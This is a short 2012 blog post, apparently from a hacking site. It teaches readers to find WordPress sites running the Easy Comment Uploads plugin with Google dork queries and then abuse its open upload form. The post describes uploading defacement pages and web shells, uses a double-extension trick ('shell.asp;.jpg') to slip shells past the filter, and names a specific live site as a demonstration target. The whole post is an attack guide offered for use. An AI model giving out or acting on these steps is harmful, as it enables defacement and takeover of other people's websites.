Tuesday, 31 January 2012

Another Wordpress Exploit : 10,000+ Websites are Vunerable For this attack

wordpress-hacked.png (195×161)WordPress Easy Comment Upload Vunerablity


Google Dork 
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php" 
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads


Open Google and enetr any dork which Given, 
Now selct any website 
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg


Live Demo :- 
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

No comments:

Post a Comment